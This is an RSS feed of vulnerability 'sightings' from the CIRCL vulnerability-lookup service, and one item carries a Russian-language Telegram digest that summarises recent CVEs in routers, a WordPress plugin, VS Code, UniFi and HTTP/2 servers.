<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent sightings.</title>
    <link>https://vulnerability.circl.lu</link>
    <description>Contains only the 10 most recent sightings.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Wed, 10 Jun 2026 05:21:41 +0000</lastBuildDate>
    <item>
      <title>2daaee5a-0b45-4266-8636-7e0e08a2f1f9</title>
      <link>https://vulnerability.circl.lu/sighting/2daaee5a-0b45-4266-8636-7e0e08a2f1f9/export</link>
      <description>{"uuid": "2daaee5a-0b45-4266-8636-7e0e08a2f1f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/5KTwmA96Kj45TkZqBYLm7RQJ-3Dt3Yk-Ro8oNdfED5lawJI", "content": "", "creation_timestamp": "2026-06-03T15:00:06.000000Z"}</description>
      <content:encoded>{"uuid": "2daaee5a-0b45-4266-8636-7e0e08a2f1f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/5KTwmA96Kj45TkZqBYLm7RQJ-3Dt3Yk-Ro8oNdfED5lawJI", "content": "", "creation_timestamp": "2026-06-03T15:00:06.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/2daaee5a-0b45-4266-8636-7e0e08a2f1f9/export</guid>
      <pubDate>Wed, 03 Jun 2026 15:00:06 +0000</pubDate>
    </item>
    <item>
      <title>87454edc-0362-4000-9231-ea207a52fd71</title>
      <link>https://vulnerability.circl.lu/sighting/87454edc-0362-4000-9231-ea207a52fd71/export</link>
      <description>{"uuid": "87454edc-0362-4000-9231-ea207a52fd71", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/true_secator/8277", "content": "\u041f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u043c \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0442\u044c \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0430\u043a\u0442\u0443\u0430\u043b\u044c\u043d\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0438 \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0435 \u0441 \u043d\u0438\u043c\u0438 \u0443\u0433\u0440\u043e\u0437\u044b:\n\n1. Acer \u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0434\u0438\u043b\u0430, \u0447\u0442\u043e \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u043d\u0430\u0434 \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u0435\u043c \u0434\u0432\u0443\u0445 0-day \u043c\u0430\u043a\u0441\u0438\u043c\u0430\u043b\u044c\u043d\u043e\u0439 \u0441\u0442\u0435\u043f\u0435\u043d\u0438 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0441\u0442\u0438 \u0432 \u0435\u0435 \u043c\u0430\u0440\u0448\u0440\u0443\u0442\u0438\u0437\u0430\u0442\u043e\u0440\u0430\u0445 \u0441 mesh-\u0441\u0435\u0442\u044c\u044e Wave 7, \u0440\u0430\u0431\u043e\u0442\u0430\u044e\u0449\u0438\u0435 \u043f\u043e\u0434 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435\u043c \u043f\u0440\u043e\u0448\u0438\u0432\u043a\u0438 \u0432\u0435\u0440\u0441\u0438\u0438 T7c_GBL_1.01.000055 \u0438\u043b\u0438 \u0431\u043e\u043b\u0435\u0435 \u0440\u0430\u043d\u043d\u0438\u0445 \u0432\u0435\u0440\u0441\u0438\u0439.\n\n\u0420\u0430\u0441\u043a\u0440\u044b\u0442\u0438\u0435 \u043f\u0440\u0438\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044e \u0413\u0435\u0440\u0433\u043e \u041f\u0430\u043f. 
\u041f\u0435\u0440\u0432\u0430\u044f CVE-2026-49200 \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u043d\u0430\u0440\u0443\u0448\u0435\u043d\u0438\u0435\u043c \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044f \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0435\u0430\u0432\u0442\u043e\u0440\u0438\u0437\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0443\u0447\u0435\u0442\u043d\u044b\u043c \u0434\u0430\u043d\u043d\u044b\u043c \u0432 \u043e\u0442\u043a\u0440\u044b\u0442\u043e\u043c \u0432\u0438\u0434\u0435, \u0445\u0440\u0430\u043d\u044f\u0449\u0438\u043c\u0441\u044f \u0432 \u0430\u0440\u0445\u0438\u0432\u0430\u0445 \u0436\u0443\u0440\u043d\u0430\u043b\u043e\u0432.\n\n\u0412\u0442\u043e\u0440\u0430\u044f CVE-2026-49201 \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u0436\u0435\u0441\u0442\u043a\u043e \u0437\u0430\u043a\u043e\u0434\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u043a\u0440\u0438\u043f\u0442\u043e\u0433\u0440\u0430\u0444\u0438\u0447\u0435\u0441\u043a\u0438\u043c \u043a\u043b\u044e\u0447\u043e\u043c, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0431\u0435\u0437 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u043e\u0441\u0442\u043e\u044f\u043d\u043d\u044b\u0439 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u043c\u0430\u0440\u0448\u0440\u0443\u0442\u0438\u0437\u0430\u0442\u043e\u0440\u0443 \u0447\u0435\u0440\u0435\u0437 \u0431\u044d\u043a\u0434\u043e\u0440.\n\n2. 
\u0425\u0430\u043a\u0435\u0440\u044b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 (CVE-2026-8206) \u0432 \u043f\u043b\u0430\u0433\u0438\u043d\u0435 Kirki - Freeform Page Builder, Website Builder &amp;amp; Customizer \u0434\u043b\u044f WordPress \u0434\u043b\u044f \u0437\u0430\u0445\u0432\u0430\u0442\u0430 \u0443\u0447\u0435\u0442\u043d\u044b\u0445 \u0437\u0430\u043f\u0438\u0441\u0435\u0439 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u043e\u0432.\n\n\u0410\u0442\u0430\u043a\u0438 \u0431\u044b\u043b\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u044b Defiant, \u0447\u0435\u0439 \u043c\u0435\u0436\u0441\u0435\u0442\u0435\u0432\u043e\u0439 \u044d\u043a\u0440\u0430\u043d Wordfence \u0437\u0430\u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u0430\u043b \u0431\u043e\u043b\u0435\u0435 222 \u043f\u043e\u043f\u044b\u0442\u043e\u043a\u00a0\u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u043a\u043b\u0438\u0435\u043d\u0442\u0430\u043c \u0437\u0430 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0435 24 \u0447\u0430\u0441\u0430. 
CVE-2026-8206 \u0432\u044b\u0437\u0432\u0430\u043d\u0430 \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0438\u0435\u043c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u043e\u0439 \u043a\u043e\u043d\u0435\u0447\u043d\u043e\u0439 \u0442\u043e\u0447\u043a\u0438 REST API \u0434\u043b\u044f \u0441\u0431\u0440\u043e\u0441\u0430 \u043f\u0430\u0440\u043e\u043b\u044f \u0447\u0435\u0440\u0435\u0437 \u0444\u0443\u043d\u043a\u0446\u0438\u044e 'handle_forgot_password()'.\n\n\u0423\u0447\u0438\u0442\u044b\u0432\u0430\u044f, \u0447\u0442\u043e \u043f\u0440\u043e\u0434\u0432\u0438\u043d\u0443\u0442\u044b\u0439 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 \u0434\u043b\u044f \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0438 \u0442\u0435\u043c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0431\u043e\u043b\u0435\u0435 \u0447\u0435\u043c \u043d\u0430 500 000 \u0432\u0435\u0431-\u0441\u0430\u0439\u0442\u043e\u0432, \u043e\u0431\u044a\u0435\u043c\u044b \u0440\u0430\u0431\u043e\u0442\u044b \u0443 \u043a\u0438\u0431\u0435\u0440\u043f\u043e\u0434\u043f\u043e\u043b\u044c\u044f \u0438\u043c\u0435\u044e\u0442\u0441\u044f. 
\n\n\u041f\u043e \u0434\u0430\u043d\u043d\u044b\u043c\u00a0Wordfence, \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0432\u043e\u0437\u043d\u0438\u043a\u043b\u0430 \u0432 \u043d\u0435\u0434\u0430\u0432\u043d\u0435\u043c \u043a\u0440\u0443\u043f\u043d\u043e\u043c \u0440\u0435\u043b\u0438\u0437\u0435, \u0432\u0435\u0440\u0441\u0438\u0438 6.0.0, \u0438 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0432\u0435\u0440\u0441\u0438\u0438 \u043f\u043b\u0430\u0433\u0438\u043d\u0430 \u0434\u043e 6.0.6 \u0432\u043a\u043b\u044e\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e, \u043a\u043e\u0442\u043e\u0440\u044b\u0435, \u0441\u043e\u0433\u043b\u0430\u0441\u043d\u043e \u0441\u0442\u0430\u0442\u0438\u0441\u0442\u0438\u043a\u0435 \u0437\u0430\u0433\u0440\u0443\u0437\u043e\u043a\u00a0\u0441 WordPress, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u043f\u043e\u0447\u0442\u0438 40% \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u043f\u043b\u0430\u0433\u0438\u043d\u0430.\n\n3. \u0422\u0435\u043c \u0432\u0440\u0435\u043c\u0435\u043d\u0435\u043c, \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u043d\u043e\u0432\u0430\u044f 0-day \u0432 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u0430\u0445 Microsoft \u0431\u0435\u0437 \u043f\u0440\u0435\u0434\u0432\u0430\u0440\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0433\u043e \u0443\u0432\u0435\u0434\u043e\u043c\u043b\u0435\u043d\u0438\u044f. 
\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u0410\u043c\u043c\u0430\u0440 \u0410\u0441\u043a\u0430\u0440 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 (GitHub), \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0438\u0439 \u043e\u0434\u043d\u0438\u043c \u0449\u0435\u043b\u0447\u043a\u043e\u043c \u043c\u044b\u0448\u0438 \u0443\u043a\u0440\u0430\u0441\u0442\u044c \u0442\u043e\u043a\u0435\u043d\u044b GitHub \u0447\u0435\u0440\u0435\u0437 \u0440\u0435\u0434\u0430\u043a\u0442\u043e\u0440 Visual Studio Code.\n\n\u041f\u0440\u0438\u0447\u0435\u043c, \u043a\u0430\u043a \u043e\u0442\u043c\u0435\u0447\u0430\u0435\u0442 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c, \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u044f \u043e\u0431 \u043e\u0448\u0438\u0431\u043a\u0430\u0445 \u0432 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u0430\u0445 Microsoft \u0431\u044b\u043b\u0438 \u043f\u0440\u043e\u0438\u0433\u043d\u043e\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u044b \u0438 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u044b \u0431\u0435\u0437 \u043a\u0430\u043a\u0438\u0445-\u043b\u0438\u0431\u043e \u0432\u043e\u0437\u043d\u0430\u0433\u0440\u0430\u0436\u0434\u0435\u043d\u0438\u0439 \u0438\u043b\u0438 \u043f\u0440\u0438\u0437\u043d\u0430\u043d\u0438\u044f.\n\n4. 
BishopFox \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0438\u00a0\u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f CVE-2026-22557, \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0449\u0435\u0439 \u0441\u043e\u0431\u043e\u0439 \u043e\u0448\u0438\u0431\u043a\u0443 \u043e\u0431\u0445\u043e\u0434\u0430 \u043f\u0443\u0442\u0438 \u043f\u0440\u0438 \u043d\u0435\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0432 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u0445 Ubiquiti UniFi.\n\n5. HP \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u043f\u0440\u043e\u0448\u0438\u0432\u043a\u0438 \u0434\u043b\u044f \u0441\u0432\u043e\u0438\u0445 VoIP-\u0442\u0435\u043b\u0435\u0444\u043e\u043d\u043e\u0432 \u0441\u0435\u0440\u0438\u0438 VVX, \u0443\u0441\u0442\u0440\u0430\u043d\u044f\u044f \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2026-0826, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0442\u044c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u043a\u043e\u0434 \u043d\u0430 \u0442\u0435\u043b\u0435\u0444\u043e\u043d\u0430\u0445 \u0431\u0435\u0437 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e\u0441\u0442\u0438 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438.\n\n\u041f\u043e \u0434\u0430\u043d\u043d\u044b\u043c Rapid7, \u043e\u043d\u0430 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c 
\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0442\u043e\u043b\u044c\u043a\u043e \u043d\u0430 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u0445, \u0433\u0434\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0444\u0443\u043d\u043a\u0446\u0438\u044f \u0438\u043d\u0442\u0435\u0440\u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0433\u043e \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u044f.\n\n6. Positive Technologies \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u0438\u043b\u0430 \u0441\u0432\u043e\u0439 \u043e\u0447\u0435\u0440\u0435\u0434\u043d\u043e\u0439 \u043c\u0430\u0439\u0441\u043a\u0438\u0439 \u0434\u0430\u0439\u0434\u0436\u0435\u0441\u0442 \u0412 \u0442\u0440\u0435\u043d\u0434\u0435 VM, \u0443\u043a\u0430\u0437\u0430\u0432 \u0433\u0440\u043e\u043c\u043a\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 Linux (CVE-2026-31431), ActiveMQ (CVE-2026-34197), SharePoint (CVE-2026-32201) \u0438 Acrobat Reader (CVE-2026-34621).\n\n7. CISA \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0434\u0438\u043b\u0430 \u043e\u0431 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u044f\u0434\u0440\u0430 Linux CVE-2022-0492 (CVSS 7,8) \u0432 \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0445 \u0443\u0441\u043b\u043e\u0432\u0438\u044f\u0445, \u0447\u0442\u043e \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043a \u0432\u044b\u0445\u043e\u0434\u0443 \u0438\u0437 \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u043e\u0432. 
\u041e\u043d\u0430 \u043e\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u043a\u0430\u043a \u043d\u0435\u043a\u043e\u0440\u0440\u0435\u043a\u0442\u043d\u0430\u044f \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u044f, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044f \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u0438 \u043e\u0431\u043e\u0439\u0442\u0438 \u0438\u0437\u043e\u043b\u044f\u0446\u0438\u044e \u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0441\u0442\u0432\u0430 \u0438\u043c\u0435\u043d.\n\n8. \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0442\u0438\u043f\u0430 HTTP/2 Bomb \u0432\u044b\u0432\u043e\u0434\u0438\u0442 \u0432\u0435\u0431-\u0441\u0435\u0440\u0432\u0435\u0440\u044b \u0438\u0437 \u0441\u0442\u0440\u043e\u044f \u0437\u0430 \u0441\u0447\u0438\u0442\u0430\u043d\u043d\u044b\u0435 \u0441\u0435\u043a\u0443\u043d\u0434\u044b.\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 Calif \u0441\u043e\u043e\u0431\u0449\u0430\u044e\u0442, \u0447\u0442\u043e \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0435 \u043c\u0435\u0442\u043e\u0434\u044b DoS-\u0430\u0442\u0430\u043a \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c \u043e\u0431\u044a\u0435\u0434\u0438\u043d\u0435\u043d\u044b \u0432 \u0446\u0435\u043f\u043e\u0447\u043a\u0443 \u0432 \u043d\u043e\u0432\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438.\n\nHTTP/2 Bomb \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e Codex \u043e\u0442 OpenAI \u0438 \u0441\u043e\u0447\u0435\u0442\u0430\u0435\u0442 \u0432 \u0441\u0435\u0431\u0435 \u0431\u043e\u043c\u0431\u0443 \u0441\u0436\u0430\u0442\u0438\u044f, \u043d\u0430\u0446\u0435\u043b\u0435\u043d\u043d\u0443\u044e \u043d\u0430 \u0441\u0445\u0435\u043c\u0443 \u0441\u0436\u0430\u0442\u0438\u044f 
\u0437\u0430\u0433\u043e\u043b\u043e\u0432\u043a\u043e\u0432 HTTP/2 (HPACK), \u0441 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u043e\u043c \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u043a\u0438 \u0432 \u0441\u0442\u0438\u043b\u0435 Slowloris, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u0440\u0435\u043f\u044f\u0442\u0441\u0442\u0432\u0443\u0435\u0442 \u043e\u0441\u0432\u043e\u0431\u043e\u0436\u0434\u0435\u043d\u0438\u044e \u043f\u0430\u043c\u044f\u0442\u0438 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u043c.\n\n\u0410\u0442\u0430\u043a\u0430 \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0431\u043e\u043b\u0435\u0435 880 000 \u0441\u0430\u0439\u0442\u043e\u0432, \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u044e\u0449\u0438\u0445 HTTP/2 \u0438 \u0440\u0430\u0431\u043e\u0442\u0430\u044e\u0449\u0438\u0445 \u043f\u043e\u0434 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435\u043c \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u044b\u0445 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0439 NGINX, Apache HTTPD, Microsoft IIS, Envoy \u0438\u043b\u0438 Cloudflare Pingora.\n\n\u041f\u0440\u0438\u0447\u0435\u043c \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0441\u043e\u0432\u0435\u0440\u0448\u0435\u043d\u0430 \u0441 \u0434\u043e\u043c\u0430\u0448\u043d\u0435\u0433\u043e \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 \u043f\u0440\u0438 \u0441\u043a\u043e\u0440\u043e\u0441\u0442\u0438 \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u044f 100 \u041c\u0431\u0438\u0442/\u0441 \u0438 \u0432 \u0441\u0447\u0438\u0442\u0430\u043d\u043d\u044b\u0435 \u0441\u0435\u043a\u0443\u043d\u0434\u044b \u0432\u044b\u0432\u0435\u0441\u0442\u0438 \u0438\u0437 \u0441\u0442\u0440\u043e\u044f \u043b\u044e\u0431\u043e\u0439 \u0438\u0437 \u044d\u0442\u0438\u0445 
\u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432.", "creation_timestamp": "2026-06-03T18:30:06.000000Z"}</description>
      <content:encoded>{"uuid": "87454edc-0362-4000-9231-ea207a52fd71", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/true_secator/8277", "content": "\u041f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u043c \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0442\u044c \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0430\u043a\u0442\u0443\u0430\u043b\u044c\u043d\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0438 \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0435 \u0441 \u043d\u0438\u043c\u0438 \u0443\u0433\u0440\u043e\u0437\u044b:\n\n1. Acer \u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0434\u0438\u043b\u0430, \u0447\u0442\u043e \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u043d\u0430\u0434 \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u0435\u043c \u0434\u0432\u0443\u0445 0-day \u043c\u0430\u043a\u0441\u0438\u043c\u0430\u043b\u044c\u043d\u043e\u0439 \u0441\u0442\u0435\u043f\u0435\u043d\u0438 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0441\u0442\u0438 \u0432 \u0435\u0435 \u043c\u0430\u0440\u0448\u0440\u0443\u0442\u0438\u0437\u0430\u0442\u043e\u0440\u0430\u0445 \u0441 mesh-\u0441\u0435\u0442\u044c\u044e Wave 7, \u0440\u0430\u0431\u043e\u0442\u0430\u044e\u0449\u0438\u0435 \u043f\u043e\u0434 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435\u043c \u043f\u0440\u043e\u0448\u0438\u0432\u043a\u0438 \u0432\u0435\u0440\u0441\u0438\u0438 T7c_GBL_1.01.000055 \u0438\u043b\u0438 \u0431\u043e\u043b\u0435\u0435 \u0440\u0430\u043d\u043d\u0438\u0445 \u0432\u0435\u0440\u0441\u0438\u0439.\n\n\u0420\u0430\u0441\u043a\u0440\u044b\u0442\u0438\u0435 \u043f\u0440\u0438\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044e \u0413\u0435\u0440\u0433\u043e \u041f\u0430\u043f. 
\u041f\u0435\u0440\u0432\u0430\u044f CVE-2026-49200 \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u043d\u0430\u0440\u0443\u0448\u0435\u043d\u0438\u0435\u043c \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044f \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0435\u0430\u0432\u0442\u043e\u0440\u0438\u0437\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0443\u0447\u0435\u0442\u043d\u044b\u043c \u0434\u0430\u043d\u043d\u044b\u043c \u0432 \u043e\u0442\u043a\u0440\u044b\u0442\u043e\u043c \u0432\u0438\u0434\u0435, \u0445\u0440\u0430\u043d\u044f\u0449\u0438\u043c\u0441\u044f \u0432 \u0430\u0440\u0445\u0438\u0432\u0430\u0445 \u0436\u0443\u0440\u043d\u0430\u043b\u043e\u0432.\n\n\u0412\u0442\u043e\u0440\u0430\u044f CVE-2026-49201 \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u0436\u0435\u0441\u0442\u043a\u043e \u0437\u0430\u043a\u043e\u0434\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u043a\u0440\u0438\u043f\u0442\u043e\u0433\u0440\u0430\u0444\u0438\u0447\u0435\u0441\u043a\u0438\u043c \u043a\u043b\u044e\u0447\u043e\u043c, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0431\u0435\u0437 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u043e\u0441\u0442\u043e\u044f\u043d\u043d\u044b\u0439 \u0434\u043e\u0441\u0442\u0443\u043f \u043a 